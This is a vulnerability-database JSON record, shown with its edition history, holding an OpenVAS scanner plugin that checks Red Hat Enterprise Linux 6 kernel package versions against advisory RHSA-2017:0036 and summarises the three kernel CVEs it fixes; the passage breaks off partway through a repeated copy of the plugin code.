{"id": "OPENVAS:1361412562310871742", "bulletinFamily": "scanner", "title": "RedHat Update for kernel RHSA-2017:0036-01", "description": "The remote host is missing an update for the ", "published": "2017-01-11T00:00:00", "modified": "2018-11-23T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310871742", "reporter": "Copyright (C) 2017 Greenbone Networks GmbH", "references": ["2017:0036-01", "https://www.redhat.com/archives/rhsa-announce/2017-January/msg00012.html"], "cvelist": ["CVE-2016-7117", "CVE-2016-6828", "CVE-2016-4998"], "type": "openvas", "lastseen": "2018-11-23T15:07:18", "history": [{"bulletin": {"bulletinFamily": "scanner", "cvelist": ["CVE-2016-7117", "CVE-2016-6828", "CVE-2016-4998"], "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "Check the version of kernel", "edition": 1, "enchantments": {}, "hash": "b04e2e324cd1c95f4b8a65bd210a5c6b6bd7246aaa63b63944d01585bca8f902", "hashmap": [{"hash": "a2323bbbec1269474bb5afba0147298f", "key": "reporter"}, {"hash": "c0606e0c13c3cd1780c2ff04443f0b37", "key": "sourceData"}, {"hash": "93a870a4cbcc9909bb7a08ec42ea9932", "key": "published"}, {"hash": "2bdabeb49c44761f9565717ab0e38165", "key": "cvss"}, {"hash": "feceaea3db20f1b814abfc37b7161f7a", "key": "pluginID"}, {"hash": "e7abf60a84a5ac895309f72a03411643", "key": "description"}, {"hash": "c6d142ba7241ded12da1b709539a85f1", "key": "title"}, {"hash": "47c1f692ea47a21f716dad07043ade01", "key": "type"}, {"hash": "ecdc2643d713b3eb6cd330f4da8f9899", "key": "href"}, {"hash": "8434f1de2dfcb7b7b6c8b0e1d09bad6c", "key": "cvelist"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "6505c1650ccfef817646bc994710ee2c", "key": "modified"}, {"hash": "09523d8f0673a86c66db6888d75720f7", "key": "references"}, {"hash": "b46559ea68ec9a13474c3a7776817cfd", "key": "naslFamily"}], "history": [], "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310871742", "id": "OPENVAS:1361412562310871742", "lastseen": "2017-07-02T21:14:31", "modified": "2017-01-16T00:00:00", "naslFamily": "Red Hat Local Security Checks", "objectVersion": "1.3", "pluginID": "1361412562310871742", "published": "2017-01-11T00:00:00", "references": ["2017:0036-01", "https://www.redhat.com/archives/rhsa-announce/2017-January/msg00012.html"], "reporter": "Copyright (C) 2017 Greenbone Networks GmbH", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for kernel RHSA-2017:0036-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.871742\");\n script_version(\"$Revision: 5014 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-01-16 11:11:55 +0100 (Mon, 16 Jan 2017) $\");\n script_tag(name:\"creation_date\", value:\"2017-01-11 05:38:12 +0100 (Wed, 11 Jan 2017)\");\n script_cve_id(\"CVE-2016-4998\", \"CVE-2016-6828\", \"CVE-2016-7117\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"RedHat Update for kernel RHSA-2017:0036-01\");\n script_tag(name: \"summary\", value: \"Check the version of kernel\");\n script_tag(name: \"vuldetect\", value: \"Get the installed version with the help\nof detect NVT and check if the version is vulnerable or not.\");\n script_tag(name: \"insight\", value: \"The kernel packages contain the Linux\nkernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\n* A use-after-free vulnerability was found in the kernels socket recvmmsg\nsubsystem. This may allow remote attackers to corrupt memory and may allow\nexecution of arbitrary code. This corruption takes place during the error\nhandling routines within __sys_recvmmsg() function. (CVE-2016-7117,\nImportant)\n\n* An out-of-bounds heap memory access leading to a Denial of Service, heap\ndisclosure, or further impact was found in setsockopt(). The function call\nis normally restricted to root, however some processes with cap_sys_admin\nmay also be able to trigger this flaw in privileged container environments.\n(CVE-2016-4998, Moderate)\n\n* A use-after-free vulnerability was found in tcp_xmit_retransmit_queue and\nother tcp_* functions. This condition could allow an attacker to send an\nincorrect selective acknowledgment to existing connections, possibly\nresetting a connection. (CVE-2016-6828, Moderate)\n\nBug Fix(es):\n\n* When parallel NFS returned a file layout, a kernel crash sometimes\noccurred. This update removes the call to the BUG_ON() function from a code\npath of a client that returns the file layout. As a result, the kernel no\nlonger crashes in the described situation. (BZ#1385480)\n\n* When a guest virtual machine (VM) on Microsoft Hyper-V was set to crash\non a Nonmaskable Interrupt (NMI) that was injected from the host, this VM\nbecame unresponsive and did not create the vmcore dump file. This update\napplies a set of patches to the Virtual Machine Bus kernel driver\n(hv_vmbus) that fix this bug. As a result, the VM now first creates and\nsaves the vmcore dump file and then reboots. (BZ#1385482)\n\n* From Red Hat Enterprise Linux 6.6 to 6.8, the IPv6 routing cache\noccasionally showed incorrect values. This update fixes the DST_NOCOUNT\nmechanism, and the IPv6 routing cache now shows correct values.\n(BZ#1391974)\n\n* When using the ixgbe driver and the software Fibre Channel over Ethernet\n(FCoE) stack, suboptimal performance in some cases occurred on systems with\na large number of CPUs. This update fixes the fc_exch_alloc() function to\ntry all the available exchange managers in the list for an available\nexchange ID. This change avoids failing allocations, which previously led\nto the host busy status. (BZ#1392818)\n\n* When the vmwgfx kernel module loads, it overrides the boot resolution\nautomatically. Consequently, users were not able to change the resolution\nby manual setting of the kernel's 'vga=' ... \n\n Description truncated, for more information please check the Reference URL\");\n script_tag(name: \"affected\", value: \"kernel on Red Hat Enterprise Linux Desktop (v. 6),\n Red Hat Enterprise Linux Server (v. 6),\n Red Hat Enterprise Linux Workstation (v. 6)\");\n script_tag(name: \"solution\", value: \"Please Install the Updated Packages.\");\n\n script_xref(name: \"RHSA\", value: \"2017:0036-01\");\n script_xref(name: \"URL\" , value: \"https://www.redhat.com/archives/rhsa-announce/2017-January/msg00012.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"HostDetails/OS/cpe:/o:redhat:enterprise_linux\", \"login/SSH/success\", \"ssh/login/release\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"RHENT_6\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.32~642.13.1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~2.6.32~642.13.1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-debuginfo\", rpm:\"kernel-debug-debuginfo~2.6.32~642.13.1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~2.6.32~642.13.1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debuginfo\", rpm:\"kernel-debuginfo~2.6.32~642.13.1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debuginfo-common-i686\", rpm:\"kernel-debuginfo-common-i686~2.6.32~642.13.1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~2.6.32~642.13.1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~2.6.32~642.13.1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perf\", rpm:\"perf~2.6.32~642.13.1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perf-debuginfo\", rpm:\"perf-debuginfo~2.6.32~642.13.1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"python-perf-debuginfo\", rpm:\"python-perf-debuginfo~2.6.32~642.13.1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-abi-whitelists\", rpm:\"kernel-abi-whitelists~2.6.32~642.13.1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~2.6.32~642.13.1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-firmware\", rpm:\"kernel-firmware~2.6.32~642.13.1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debuginfo-common-x86_64\", rpm:\"kernel-debuginfo-common-x86_64~2.6.32~642.13.1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "title": "RedHat Update for kernel RHSA-2017:0036-01", "type": "openvas", "viewCount": 0}, "differentElements": ["modified", "sourceData"], "edition": 1, "lastseen": "2017-07-02T21:14:31"}, {"bulletin": {"bulletinFamily": "scanner", "cvelist": ["CVE-2016-7117", "CVE-2016-6828", "CVE-2016-4998"], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "Check the version of kernel", "edition": 3, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "63623acff99edeba199c6ae70bc0fe0efa51d47a336e97d60a4d3e1990cd2b02", "hashmap": [{"hash": "a2323bbbec1269474bb5afba0147298f", "key": "reporter"}, {"hash": "93a870a4cbcc9909bb7a08ec42ea9932", "key": "published"}, {"hash": "da63064ac29a598defb6bfdc86824d3b", "key": "sourceData"}, {"hash": "602bced6320cec4ab33d131e0b746b65", "key": "modified"}, {"hash": "feceaea3db20f1b814abfc37b7161f7a", "key": "pluginID"}, {"hash": "e7abf60a84a5ac895309f72a03411643", "key": "description"}, {"hash": "c6d142ba7241ded12da1b709539a85f1", "key": "title"}, {"hash": "47c1f692ea47a21f716dad07043ade01", "key": "type"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "ecdc2643d713b3eb6cd330f4da8f9899", "key": "href"}, {"hash": "8434f1de2dfcb7b7b6c8b0e1d09bad6c", "key": "cvelist"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "09523d8f0673a86c66db6888d75720f7", "key": "references"}, {"hash": "b46559ea68ec9a13474c3a7776817cfd", "key": "naslFamily"}], "history": [], "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310871742", "id": "OPENVAS:1361412562310871742", "lastseen": "2018-08-30T19:18:58", "modified": "2017-07-12T00:00:00", "naslFamily": "Red Hat Local Security Checks", "objectVersion": "1.3", "pluginID": "1361412562310871742", "published": "2017-01-11T00:00:00", "references": ["2017:0036-01", "https://www.redhat.com/archives/rhsa-announce/2017-January/msg00012.html"], "reporter": "Copyright (C) 2017 Greenbone Networks GmbH", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for kernel RHSA-2017:0036-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.871742\");\n script_version(\"$Revision: 6691 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-12 11:51:43 +0200 (Wed, 12 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2017-01-11 05:38:12 +0100 (Wed, 11 Jan 2017)\");\n script_cve_id(\"CVE-2016-4998\", \"CVE-2016-6828\", \"CVE-2016-7117\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"RedHat Update for kernel RHSA-2017:0036-01\");\n script_tag(name: \"summary\", value: \"Check the version of kernel\");\n script_tag(name: \"vuldetect\", value: \"Get the installed version with the help\nof detect NVT and check if the version is vulnerable or not.\");\n script_tag(name: \"insight\", value: \"The kernel packages contain the Linux\nkernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\n* A use-after-free vulnerability was found in the kernels socket recvmmsg\nsubsystem. This may allow remote attackers to corrupt memory and may allow\nexecution of arbitrary code. This corruption takes place during the error\nhandling routines within __sys_recvmmsg() function. (CVE-2016-7117,\nImportant)\n\n* An out-of-bounds heap memory access leading to a Denial of Service, heap\ndisclosure, or further impact was found in setsockopt(). The function call\nis normally restricted to root, however some processes with cap_sys_admin\nmay also be able to trigger this flaw in privileged container environments.\n(CVE-2016-4998, Moderate)\n\n* A use-after-free vulnerability was found in tcp_xmit_retransmit_queue and\nother tcp_* functions. This condition could allow an attacker to send an\nincorrect selective acknowledgment to existing connections, possibly\nresetting a connection. (CVE-2016-6828, Moderate)\n\nBug Fix(es):\n\n* When parallel NFS returned a file layout, a kernel crash sometimes\noccurred. This update removes the call to the BUG_ON() function from a code\npath of a client that returns the file layout. As a result, the kernel no\nlonger crashes in the described situation. (BZ#1385480)\n\n* When a guest virtual machine (VM) on Microsoft Hyper-V was set to crash\non a Nonmaskable Interrupt (NMI) that was injected from the host, this VM\nbecame unresponsive and did not create the vmcore dump file. This update\napplies a set of patches to the Virtual Machine Bus kernel driver\n(hv_vmbus) that fix this bug. As a result, the VM now first creates and\nsaves the vmcore dump file and then reboots. (BZ#1385482)\n\n* From Red Hat Enterprise Linux 6.6 to 6.8, the IPv6 routing cache\noccasionally showed incorrect values. This update fixes the DST_NOCOUNT\nmechanism, and the IPv6 routing cache now shows correct values.\n(BZ#1391974)\n\n* When using the ixgbe driver and the software Fibre Channel over Ethernet\n(FCoE) stack, suboptimal performance in some cases occurred on systems with\na large number of CPUs. This update fixes the fc_exch_alloc() function to\ntry all the available exchange managers in the list for an available\nexchange ID. This change avoids failing allocations, which previously led\nto the host busy status. (BZ#1392818)\n\n* When the vmwgfx kernel module loads, it overrides the boot resolution\nautomatically. Consequently, users were not able to change the resolution\nby manual setting of the kernel's 'vga=' ... \n\n Description truncated, for more information please check the Reference URL\");\n script_tag(name: \"affected\", value: \"kernel on Red Hat Enterprise Linux Desktop (v. 6),\n Red Hat Enterprise Linux Server (v. 6),\n Red Hat Enterprise Linux Workstation (v. 6)\");\n script_tag(name: \"solution\", value: \"Please Install the Updated Packages.\");\n\n script_xref(name: \"RHSA\", value: \"2017:0036-01\");\n script_xref(name: \"URL\" , value: \"https://www.redhat.com/archives/rhsa-announce/2017-January/msg00012.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"RHENT_6\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.32~642.13.1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~2.6.32~642.13.1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-debuginfo\", rpm:\"kernel-debug-debuginfo~2.6.32~642.13.1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~2.6.32~642.13.1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debuginfo\", rpm:\"kernel-debuginfo~2.6.32~642.13.1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debuginfo-common-i686\", rpm:\"kernel-debuginfo-common-i686~2.6.32~642.13.1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~2.6.32~642.13.1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~2.6.32~642.13.1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perf\", rpm:\"perf~2.6.32~642.13.1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perf-debuginfo\", rpm:\"perf-debuginfo~2.6.32~642.13.1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"python-perf-debuginfo\", rpm:\"python-perf-debuginfo~2.6.32~642.13.1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-abi-whitelists\", rpm:\"kernel-abi-whitelists~2.6.32~642.13.1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~2.6.32~642.13.1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-firmware\", rpm:\"kernel-firmware~2.6.32~642.13.1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debuginfo-common-x86_64\", rpm:\"kernel-debuginfo-common-x86_64~2.6.32~642.13.1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "title": "RedHat Update for kernel RHSA-2017:0036-01", "type": "openvas", "viewCount": 6}, "differentElements": ["cvss"], "edition": 3, "lastseen": "2018-08-30T19:18:58"}, {"bulletin": {"bulletinFamily": "scanner", "cvelist": ["CVE-2016-7117", "CVE-2016-6828", "CVE-2016-4998"], "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "Check the version of kernel", "edition": 4, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "5e1b4013872429c416c069e8e87497bf953ef486e902ddf07a6943a03abe60ef", "hashmap": [{"hash": "a2323bbbec1269474bb5afba0147298f", "key": "reporter"}, {"hash": "93a870a4cbcc9909bb7a08ec42ea9932", "key": "published"}, {"hash": "da63064ac29a598defb6bfdc86824d3b", "key": "sourceData"}, {"hash": "2bdabeb49c44761f9565717ab0e38165", "key": "cvss"}, {"hash": "602bced6320cec4ab33d131e0b746b65", "key": "modified"}, {"hash": "feceaea3db20f1b814abfc37b7161f7a", "key": "pluginID"}, {"hash": "e7abf60a84a5ac895309f72a03411643", "key": "description"}, {"hash": "c6d142ba7241ded12da1b709539a85f1", "key": "title"}, {"hash": "47c1f692ea47a21f716dad07043ade01", "key": "type"}, {"hash": "ecdc2643d713b3eb6cd330f4da8f9899", "key": "href"}, {"hash": "8434f1de2dfcb7b7b6c8b0e1d09bad6c", "key": "cvelist"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "09523d8f0673a86c66db6888d75720f7", "key": "references"}, {"hash": "b46559ea68ec9a13474c3a7776817cfd", "key": "naslFamily"}], "history": [], "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310871742", "id": "OPENVAS:1361412562310871742", "lastseen": "2018-09-01T23:41:20", "modified": "2017-07-12T00:00:00", "naslFamily": "Red Hat Local Security Checks", "objectVersion": "1.3", "pluginID": "1361412562310871742", "published": "2017-01-11T00:00:00", "references": ["2017:0036-01", "https://www.redhat.com/archives/rhsa-announce/2017-January/msg00012.html"], "reporter": "Copyright (C) 2017 Greenbone Networks GmbH", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for kernel RHSA-2017:0036-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.871742\");\n script_version(\"$Revision: 6691 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-12 11:51:43 +0200 (Wed, 12 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2017-01-11 05:38:12 +0100 (Wed, 11 Jan 2017)\");\n script_cve_id(\"CVE-2016-4998\", \"CVE-2016-6828\", \"CVE-2016-7117\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"RedHat Update for kernel RHSA-2017:0036-01\");\n script_tag(name: \"summary\", value: \"Check the version of kernel\");\n script_tag(name: \"vuldetect\", value: \"Get the installed version with the help\nof detect NVT and check if the version is vulnerable or not.\");\n script_tag(name: \"insight\", value: \"The kernel packages contain the Linux\nkernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\n* A use-after-free vulnerability was found in the kernels socket recvmmsg\nsubsystem. This may allow remote attackers to corrupt memory and may allow\nexecution of arbitrary code. This corruption takes place during the error\nhandling routines within __sys_recvmmsg() function. (CVE-2016-7117,\nImportant)\n\n* An out-of-bounds heap memory access leading to a Denial of Service, heap\ndisclosure, or further impact was found in setsockopt(). The function call\nis normally restricted to root, however some processes with cap_sys_admin\nmay also be able to trigger this flaw in privileged container environments.\n(CVE-2016-4998, Moderate)\n\n* A use-after-free vulnerability was found in tcp_xmit_retransmit_queue and\nother tcp_* functions. This condition could allow an attacker to send an\nincorrect selective acknowledgment to existing connections, possibly\nresetting a connection. (CVE-2016-6828, Moderate)\n\nBug Fix(es):\n\n* When parallel NFS returned a file layout, a kernel crash sometimes\noccurred. This update removes the call to the BUG_ON() function from a code\npath of a client that returns the file layout. As a result, the kernel no\nlonger crashes in the described situation. (BZ#1385480)\n\n* When a guest virtual machine (VM) on Microsoft Hyper-V was set to crash\non a Nonmaskable Interrupt (NMI) that was injected from the host, this VM\nbecame unresponsive and did not create the vmcore dump file. This update\napplies a set of patches to the Virtual Machine Bus kernel driver\n(hv_vmbus) that fix this bug. As a result, the VM now first creates and\nsaves the vmcore dump file and then reboots. (BZ#1385482)\n\n* From Red Hat Enterprise Linux 6.6 to 6.8, the IPv6 routing cache\noccasionally showed incorrect values. This update fixes the DST_NOCOUNT\nmechanism, and the IPv6 routing cache now shows correct values.\n(BZ#1391974)\n\n* When using the ixgbe driver and the software Fibre Channel over Ethernet\n(FCoE) stack, suboptimal performance in some cases occurred on systems with\na large number of CPUs. This update fixes the fc_exch_alloc() function to\ntry all the available exchange managers in the list for an available\nexchange ID. This change avoids failing allocations, which previously led\nto the host busy status. (BZ#1392818)\n\n* When the vmwgfx kernel module loads, it overrides the boot resolution\nautomatically. Consequently, users were not able to change the resolution\nby manual setting of the kernel's 'vga=' ... \n\n Description truncated, for more information please check the Reference URL\");\n script_tag(name: \"affected\", value: \"kernel on Red Hat Enterprise Linux Desktop (v. 6),\n Red Hat Enterprise Linux Server (v. 6),\n Red Hat Enterprise Linux Workstation (v. 6)\");\n script_tag(name: \"solution\", value: \"Please Install the Updated Packages.\");\n\n script_xref(name: \"RHSA\", value: \"2017:0036-01\");\n script_xref(name: \"URL\" , value: \"https://www.redhat.com/archives/rhsa-announce/2017-January/msg00012.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"RHENT_6\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.32~642.13.1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~2.6.32~642.13.1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-debuginfo\", rpm:\"kernel-debug-debuginfo~2.6.32~642.13.1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~2.6.32~642.13.1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debuginfo\", rpm:\"kernel-debuginfo~2.6.32~642.13.1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debuginfo-common-i686\", rpm:\"kernel-debuginfo-common-i686~2.6.32~642.13.1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~2.6.32~642.13.1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~2.6.32~642.13.1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perf\", rpm:\"perf~2.6.32~642.13.1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perf-debuginfo\", rpm:\"perf-debuginfo~2.6.32~642.13.1.el6\", 